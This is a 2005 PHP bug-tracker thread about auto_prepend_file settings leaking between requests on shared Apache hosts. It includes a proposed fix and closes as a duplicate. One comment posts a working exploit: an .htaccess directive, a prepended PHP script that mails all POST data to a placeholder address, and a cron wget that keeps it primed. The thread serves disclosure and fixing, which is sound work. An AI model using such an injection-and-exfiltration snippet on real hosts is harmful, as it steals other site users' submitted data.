php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Bug #31844 ini value settings maintaining state between requests
Submitted: 2005-02-04 13:03 UTC Modified: 2005-02-08 23:31 UTC
Votes:1
Avg. Score:5.0 ± 0.0
Reproduced:1 of 1 (100.0%)
Same Version:1 (100.0%)
Same OS:0 (0.0%)
From: phpbugrep-20050204 at pgregg dot com Assigned:
Status: Closed Package: *Web Server problem
PHP Version: Irrelevant OS: All
Private report: No CVE-ID: None
 [2005-02-04 13:03 UTC] phpbugrep-20050204 at pgregg dot com
Description:
------------
SECURITY ALERT:

Related to: http://bugs.php.net/bug.php?id=28729
http://bugs.php.net/bug.php?id=27110

(First the rant) This isn't the same bug... and to be honest I'm getting quite pissed at the amount of times a bug is reported only to be closed as Bogus because dev can't be arsed to look into it.  This just results in people not bothering to report bugs.


In this case, the auto_prepend_file and auto_append_file values are not reset between requests.  Thus one change in a .htaccess file results in the change lingering on for the next request (perhaps even on a different vhost).   

This could be a very nasty security issue because it lets me, in a web hotel, insert code into other people websites, such as emailing me $GLOBALS so I could extract credit card details, etc.

I believe the fix is in main/main.c (in 5.0.3) in php_module_startup() to add:
 PG(auto_prepend_file) = NULL;
 PG(auto_append_file) = NULL;
The same will be the case in the 4.x tree.

The same should be true for other "leaking" values.

As a workaround setting the Apache MaxRequests to 1 will result in a fresh apache and as a result a fresh php. The hit is poor performance.




Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2005-02-04 19:02 UTC] kevinphpdotnet at stormtide dot ca
Working example exploit. Because the auto-prepend is not reset we can add exploit.php to other scripts (even ones we dont own) provided that we are the first request to a child thread. 

--------  .htaccess --------

php_value auto_prepend_file exploit.php

-------- exploit.php --------

<?php
if($_SERVER['REQUEST_METHOD'] == "POST") {
	mail("somehacked@host.com", "Values", var_export($_POST));
}
?>

-------- legit.php -----------
<?PHP
echo "a";
?>


---- cron entry elsewhere ----

wget http://www.mywebhotel.com/legit.php 

set every minute
 [2005-02-07 00:38 UTC] rasmus@php.net
So have you actually verified that this happens with Apache1+PHP4.x?  I'll test other versions as well, but I just tested that combination and auto_prepend_file is getting reset correctly there.  If it only happens on certain server versions or certain PHP versions, please provide those versions so we have a chance to verify this.  
 [2005-02-08 23:31 UTC] phpbugrep-20050204 at pgregg dot com
Hi Rasmus,

After some more research we believe this is a duplicate of http://bugs.php.net/bug.php?id=25753 as this issue is not apparent beyond 4.3.3

Many thanks for your attention on this,

Paul.
 
PHP Copyright © 2001-2019 The PHP Group
All rights reserved.
Last updated: Sun Aug 18 23:01:26 2019 UTC